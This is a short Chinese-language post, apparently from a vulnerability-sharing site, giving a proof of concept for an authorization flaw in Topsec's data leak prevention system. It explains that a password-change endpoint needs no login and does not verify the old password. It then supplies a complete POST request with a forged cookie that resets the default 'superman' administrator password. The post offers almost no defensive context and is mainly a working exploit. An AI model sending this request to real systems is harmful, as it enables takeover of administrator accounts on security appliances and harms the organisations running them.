天融信數據防洩漏系統越權修改管理員密碼漏洞

# 天融信數據防洩漏系統越權修改管理員密碼漏洞
==POC==
無需登錄權限,由於修改密碼處未校驗原密碼,且/?module=auth_user&action=mod_edit_pwd,接口未授權訪問,造成直接修改任意用戶密 碼,默認superman賬戶uid為1

POST /?module=auth_user&action=mod_edit_pwd 
Cookie: username=superman;

uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容